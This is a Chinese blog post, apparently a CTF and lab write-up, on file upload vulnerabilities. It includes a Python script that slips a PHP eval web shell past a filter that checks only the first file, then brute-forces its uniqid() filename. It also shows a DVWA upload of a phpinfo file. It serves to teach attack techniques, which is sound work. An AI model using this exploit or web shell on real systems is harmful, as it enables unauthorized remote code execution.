【文件上传基本原理讲解】

已于 2024-05-31 22:31:27 修改
阅读量312 收藏 5
点赞数 3
分类专栏: CTF 文章标签: php linux 服务器 运维
于 2024-05-31 21:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45131319/article/details/139215330
版权

流程

一、文件上传漏洞简介

请添加图片描述

二、使用php实现文件上传功能

请添加图片描述

三、普通上传型

请添加图片描述
请添加图片描述
我们可以看到upload先获取了file的变量,再获取了小写后的文件名获取后缀,匹配文件名后缀是不是.php,如果是就返回false,然后再设置上传限制。那么我们再通过判断文件源码发现只对上传文件的第一个file进行的过滤,如果我们上传两个文件,第一个为正常的文件,第二个为我们需要上传的文件,就可以绕过过滤,我们用python构造一个请求:
请添加图片描述
使用open读取两个文件,pure为正常文件,eval为我们想要的文件,再设置一个代理,这个代理是burp的代理,构造一个files来提交文件,通过post请求提交我们的文件,通过burp查看我们的请求有没有提交成功:
请添加图片描述
发现文件正常提交,服务器返回了file路径,但是却没有返回第二个文件的路径

uniqid()

uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID。

基于我们对php文件的了解,这个文件名应该是用时间戳来命名的,用的uniqid(),我们可以确定后缀是php,那么我们只需要爆破后三到四位就行,因为我们是同时上传的两个文件,那么两个文件的上传时间是差不多的,当uniqid两个时间差不多时,只有后几位会有变动如下图所示:请添加图片描述
所以我们只需要爆破文件的后三到四位即可,丢进burp里面爆破了4万多次后成功获取到文件名:
请添加图片描述

也可以用python脚本一起上传后直接爆破,下面是代码:

import requests
import time
import json

url = "http://172.16.12.2:81/"

path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print param
t1 = int(t1, 16)  #将获取到的文件名转回16进制

j = t1
while True:
    path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:-1] #16进制通过hex编码回uniqid
    try:
        r = requests.get(path,timeout=1)
    except:
        continue
    if r.status_code == 429:
        time.sleep(0.1)
        continue
    elif r.status_code != 404:
        print path
        print r.text
        break
    print j, path, r.status_code
    j -= 1 #通过自减后hex编码实现文件名爆破

DAWA LOW

DAWA LOW级别的文件上传:
请添加图片描述
DVWA_WEB_TO_ROOT.'hackable/uploads/'等于上传文件的文件夹,$_FILES()这个函数用来获取文件名字,文件夹路径加文件名,就是这个文件的绝对路径,后面move_Pupladed_file()就是把临时文件放入到绝对路径中。我们试着传入一个文件然后拦截一下数据包,看看数据是怎么上传的。请添加图片描述
上传成功后,我们再看一下源码分析,在用户叭文件上传后,直接就把文件放入了目录,没有经过任何的过滤,所以说我们可以传任意文件,比如我们传入一个php文件里面内容是:

<?php
phpinfo();
?>

请添加图片描述
成功传入后,我们直接打开目标路径,成功运行了phpinfo():请添加图片描述

盖头盖
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
html input文件上传原理,自定义input file样式及原理讲解
weixin_29821223的博客
05-31 853
0.写在前面当有要上传文件需要的时候常会用到,但它默认的样式确实有些影响使用体验......上传图片在谷歌浏览器使用该标签的样式再看一个我通过修改CSS实现的样式:呃,虽然只是个没什么特色的绿底白字的样式,但是总比初始的感觉好吧... 言归正传,当你明白了修改input type="file"按钮的原理后,自然可以设计出更佳的样式。1.修改原理(分步讲解)上传图片这是html中的内容,文本和inp...
django 20、上传文件原理解析
qingyuanluofeng的专栏
12-10 3491
最近还是被django的上传大文件搞得晕头转向,转而看了这方面的原理,把自己的心得写了出来。 首先,我想说:如果你使用的是django默认的FileField的形式通过表单上传,那么其实你完全不需要管理如何上传,或者自己去写一个分块读取写入的函数, 这个是django已经帮你做完了。 表单接收到的上传文件数据在还没有被我们完全接收时,数据存放在哪里?   1默认,上传文件&lt;2.5M...
Web安全——文件上传漏洞原理讲解
weixin_44791273的博客
09-26 1504
一、 基础知识 Web应用程序在处理用户上传的文件操作时,如果用户上传文件的路径、文件名、扩展名成为用户可控数据,就会导致直接上传脚本木马到web服务器上,直接控制web服务器。 上传——>访问——>解析——>防护 文件上传功能本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 01 造成恶意文件上传的原因 (1)文件上传时检查不严 比如应用在文件上传时根本没有进行文件格式检查,导致攻击者可以直接上传恶意文件。 或应用仅仅在
文件上传基本原理(二)
李平安
09-06 2211
一.概述 1.在文件上传基本原理(一)中介绍了HTTP报文的简介以及报文的基本格式 2.本节主要介绍common-Fileupload是如何解析请求报文的实体的 二.common-fileupload的类结构 三.解析大致流程 四.解析实例讲解 4.1 假设一个报文如图 ------WebKitFormBoundaryE2KKgliuAAe4H3XB Con
文件上传漏洞-原理篇
AkangBoy的博客
12-02 3529
本文主要介绍文件上传漏洞原理、危害等基础知识,以及常见的文件上传检测机制和绕过手段
爬虫基本原理讲解
Python_cocola的博客
05-14 1675
1.什么是爬⾍? 2.爬虫基本流程 3.什么是Request和Response? 4.Request中包含什么? 5.Response中包含什么? 6.爬虫能抓怎样的数据? 7.怎样来解析? 8.为什什么我抓到的和浏览器器看到的不一样? 9.怎样解决JavaScript渲染的问题? 10.可以怎样保存数据 1.什么是爬⾍? 请求网站并提取数据的自动化程序 2.爬虫基本流程 2.1 发起请求 通过HTTP库向目标站点发起请求,即发送一个Request,请求可以包含额外的headers等信息,等待服务器响应。
七牛云上传文件-业务逻辑以及代码讲解
qq_42861526的博客
07-13 1295
使用七牛云作为第三方服务完成文件的存储,讲解七牛云如何使用以及它的业务逻辑
JavaWeb——文件下载和上传及传输原理
ouyangkq666的博客
12-10 1194
一、下载文件 步骤 要获取下载文件的路径 下载的文件名是啥? 设置想办法让浏览器能够支持下载我们需要的东西 获取下载文件的输入流 创建缓冲区 获取OutputStream对象 将FileOutputStream流写入到buffer缓冲区 使用OutputStream将缓冲区中的数据输出到客户端! 代码实现 JavaWeb——Tomcat_ouyangkq666的博客-CSDN博客 JavaWeb——Maven_ouyangkq666的博客-CSDN博客 代...
文件上传原理
weixin_42533732的博客
01-05 516
当我们在做文件上传的功能时,如果上传的文件过大,可能会导致长传时间特别长,且上传失败后需要整个文件全部重新上传。因此,我们需要前后端配合来解决这个问题。最常用的解决方案就是 —— 切片上传。
揭秘前端文件上传原理(一)
热门推荐
全栈者 的博客
09-06 1万+
在平时工作中,总是会接触过很多文件上传的功能,因为用惯了各种操作库来处理,所以总有一种云里雾里的感觉,没有清晰的思路,归根到底还是没有理解文件上传的原理。接下来将揭起工具...
web文件上传原理讲解与代码
08-31
本文将详细介绍Web文件上传基本原理及其实现方法,并通过具体的代码示例来帮助读者更好地理解和掌握这一技术。 #### 二、HTTP表单上传规范 文件上传的核心是通过HTTP协议完成数据传输。当用户选择文件并提交表单...
PHP文件上传主要代码讲解
10-26
本文将详细解析有关PHP文件上传的核心代码及其背后的原理。首先,我们要了解PHP如何处理文件上传,并掌握关键的PHP全局数组`$_FILES`。 `$_FILES`是一个预定义的数组,用于存储上传文件的相关信息。在给出的代码...
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
2401_84413795的博客
09-02 550
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板
2403_86698467的博客
09-02 564
包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。
从0开始的CTF个人练习生涯
CHTXRT的博客
09-03 334
就此离开,没人会受伤
如何优化浏览器缓存
web_geek的博客
09-04 1067
不过您使用的是WordPress,就省事很多,有许多出色的 WordPress 插件可以帮助您设置,大多数好的主机公司也会提供设置合理的默认值,比如Hostease的虚拟主机,在默认设置的基础上,您还可以联系技术支持为您做调整,所以说,选择一个可靠的主机商,对于网站建设来说也是非常重要的。每当用户访问您的网站,他他们的浏览器需要从服务器上下载页面显示所需的资源(图片、CSS、JavaScript 和字体等),这些资源的下载会占用带宽,并需要一定的传输时间。这是一个新文件,因此不存在提供过时文件的风险。
JAVA—网络通信
最新发布
Hismybestlove的博客
09-05 1364
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
域名解析DNS服务
qq_59349464的博客
09-01 1589
DNS 是互联网上解决网络中机器命名的一种系统。在网络中,一台主机去访问另外一台主机时,必须要 知道目标主机的IP地址,虽然网络上的节点都可以用IP地址来标识,并且可以通过IP地址被访问。但对 于自然人而言,一组组由数字组成的IP地址,是难以被理解和记忆的。于是设计出了域名系统,用一组 有意义的字符来表示某个特定主机或某个网络,再将网络中主机IP地址和域名之间做成一个映射表。
Java Web文件上传下载实现及原理
本章详细讲解了这一主题,涵盖了从基本原理到具体实践的多个方面。首先,文件上传的原理基于HTTP协议,客户端使用表单以`multipart/form-data`编码格式发送文件字节流到服务器端,服务器端解析并处理这些字节流。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值